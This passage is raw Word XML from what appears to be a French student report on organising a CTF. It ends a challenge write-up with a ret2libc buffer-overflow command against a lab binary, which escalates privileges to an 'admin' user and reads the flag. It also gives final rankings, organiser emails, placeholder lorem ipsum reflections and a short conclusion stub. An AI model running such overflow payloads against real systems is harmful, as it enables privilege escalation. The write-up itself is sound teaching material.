              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>toto</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>@</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>debian</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>:/home/admin$ ./vuln $(python -c 'from struct import pack; print "A"*136 + pack("&lt;I", 0xf7e39c50) + pack("&lt;I", 0xf7e2d9b0) + pack("&lt;I", 0xf7f5b528)')</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP�������(��</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>$ id</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>uid=1000(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>toto</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>) gid=1001(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>toto</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>) euid=1001(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b/>
                <w:bCs/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>admin</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>) egid=1002(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b/>
                <w:bCs/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>admin</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>) groups=1002(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b/>
                <w:bCs/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>admin</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>),1001(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>toto</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>$</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t xml:space="preserve"> cat flag.txt</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b/>
                <w:bCs/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>ese{climbing_is_cool}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="_Toc77086838"/>
      <w:bookmarkStart w:id="44" w:name="_Toc29529639"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:color w:val="595959"/>
        </w:rPr>
        <w:t>Résultat du CTF</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/>
      <w:bookmarkEnd w:id="44"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Après 8 heures de compétition, une première équipe s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>’est largement démarquée des autres avec 2600 points sur un maximum de 4300 points. Pour la petite anédocte, les vainqueurs n’étaient que 2 et ne se connaissaient pas avant le CTF.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Cinq minutes avant la fin, les équipes HackThePanda, LesPapasTesticiaques et 0xDEADBEEF étaient égalité avec 850 points mais les membres de HackThePanda ont réussi à valider le challenge Glob Secret Manager ce qui leur a permis d’arriver à la 3ème place avec 1050 et passer devant Zenk Security.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5814060" cy="3241675"/>
            <wp:effectExtent l="0" t="0" r="15240" b="15875"/>
            <wp:docPr id="19" name="Picture 19" descr="Capture d'écran de 2016-05-23 15-0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Capture d'écran de 2016-05-23 15-08-36"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5814060" cy="3241675"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="52" w:name="_GoBack"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="720"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="2520" w:right="1512" w:bottom="1800" w:left="1512" w:header="1080" w:footer="720" w:gutter="0"/>
          <w:pgNumType w:fmt="decimal"/>
          <w:cols w:space="720" w:num="1"/>
          <w:docGrid w:linePitch="360" w:charSpace="0"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:bookmarkEnd w:id="52"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="45" w:name="_Toc1678560682"/>
      <w:bookmarkStart w:id="46" w:name="_Toc1597541722"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:color w:val="595959"/>
        </w:rPr>
        <w:t>Points de vue personnel</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45"/>
      <w:bookmarkEnd w:id="46"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="106"/>
        <w:tblW w:w="9216" w:type="dxa"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="0" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3058"/>
        <w:gridCol w:w="20"/>
        <w:gridCol w:w="3058"/>
        <w:gridCol w:w="22"/>
        <w:gridCol w:w="3058"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3058" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:color="D8D8D8" w:themeColor="background1" w:themeShade="D9" w:sz="8" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="7E97AD" w:themeFill="accent1"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="307"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>ROPELEWSKI</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:t>Maxime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="307"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3058" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:color="D8D8D8" w:themeColor="background1" w:themeShade="D9" w:sz="8" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="7E97AD" w:themeFill="accent1"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="307"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">DE REYDELLET ROMAIN </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>(RESPONSABLE)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="22" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="307"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3058" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:color="D8D8D8" w:themeColor="background1" w:themeShade="D9" w:sz="8" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="7E97AD" w:themeFill="accent1"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="307"/>
            </w:pPr>
            <w:r>
              <w:t>PEIRO</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="307"/>
            </w:pPr>
            <w:r>
              <w:t>VALENTIN</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3058" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="251"/>
              <w:spacing w:before="0"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="1939290" cy="1443990"/>
                  <wp:effectExtent l="0" t="0" r="3810" b="381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pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId30"/>
                          <a:srcRect b="9547"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1939290" cy="1443990"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525">
                            <a:noFill/>
                            <a:miter/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="251"/>
              <w:spacing w:before="0"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3058" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="251"/>
              <w:spacing w:before="0"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="1973580" cy="1430655"/>
                  <wp:effectExtent l="0" t="0" r="7620"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pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId31"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1973580" cy="1430655"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525">
                            <a:noFill/>
                            <a:miter/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="22" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="251"/>
              <w:spacing w:before="0"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3058" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="251"/>
              <w:spacing w:before="0"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="1966595" cy="1403985"/>
                  <wp:effectExtent l="0" t="0" r="5080" b="571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pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId32"/>
                          <a:srcRect l="8781" r="7963"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1966595" cy="1403985"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525">
                            <a:noFill/>
                            <a:miter/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3058" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="306"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="105"/>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:color w:val="595959"/>
              </w:rPr>
              <w:t xml:space="preserve">Email </w:t>
            </w:r>
            <w:r>
              <w:t>ropelewski@et.esiea.fr</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="306"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="105"/>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:color w:val="595959"/>
              </w:rPr>
              <w:t xml:space="preserve">Fonction </w:t>
            </w:r>
            <w:r>
              <w:t>Challenges de Web App /Miscellaneous</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="306"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3058" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="306"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="105"/>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:color w:val="595959"/>
              </w:rPr>
              <w:t xml:space="preserve">Email </w:t>
            </w:r>
            <w:r>
              <w:t>dereydellet@et.esiea.fr</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="306"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="105"/>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:color w:val="595959"/>
              </w:rPr>
              <w:t xml:space="preserve">Fonction </w:t>
            </w:r>
            <w:r>
              <w:t>Challenges de Cryptography /Web App</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="22" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="306"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3058" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="306"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="105"/>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:color w:val="595959"/>
              </w:rPr>
              <w:t xml:space="preserve">Email </w:t>
            </w:r>
            <w:r>
              <w:t>peiro@et.esiea.fr</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="306"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="105"/>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:color w:val="595959"/>
              </w:rPr>
              <w:t xml:space="preserve">Fonction </w:t>
            </w:r>
            <w:r>
              <w:t>Challenges de Reverse Engineering</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="47" w:name="_Toc1494717152"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="577188"/>
        </w:rPr>
        <w:t>DE REYDELLET Romain</w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Un projet qui m’a tenu très à coeur et qui m’a demandé beaucoup de travail de part sa compléxité et sa taille. J’ai pu apprendre de nouvelles chose</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve"> notamment avec le challenge basé sur le framework Flask en python. Avec les cours dispensés cette année en 3ème année j’ai pu mettre en pratique ce que j’avais appris en réseau et en sysadmin à travers la configuration des machines et la sécurité de celles-ci.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">La réussite de ce projet me conforte dans mon envie de travailler dans le domaine de la cyber sécurité </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>notamment dans les tests d’intrusions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Le jour du CTF j’ai pu rencontrer d’autres passionnés et nous pensons particper à des CTF avec certains d’entre eux.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="48" w:name="_Toc1425606556"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="577188"/>
        </w:rPr>
        <w:t>PEIRO Valentin</w:t>
      </w:r>
      <w:bookmarkEnd w:id="48"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="577188"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam,quis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pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="49" w:name="_Toc863627998"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="577188"/>
        </w:rPr>
        <w:t>ROPELEWSKI Maxime</w:t>
      </w:r>
      <w:bookmarkEnd w:id="49"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="577188"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="50" w:name="_Toc452112678"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam,quis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pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="both"/>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="2520" w:right="1512" w:bottom="1800" w:left="1512" w:header="1080" w:footer="720" w:gutter="0"/>
          <w:pgNumType w:fmt="decimal"/>
          <w:cols w:space="720" w:num="1"/>
          <w:docGrid w:linePitch="360" w:charSpace="0"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="51" w:name="_Toc66908509"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:color w:val="595959"/>
        </w:rPr>
        <w:t>Conclusion et remerciements</w:t>
      </w:r>
      <w:bookmarkEnd w:id="50"/>
      <w:bookmarkEnd w:id="51"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:color w:val="595959"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:t>(suiveurs, KPS et autres sponsors CEA, et participants)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="720"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
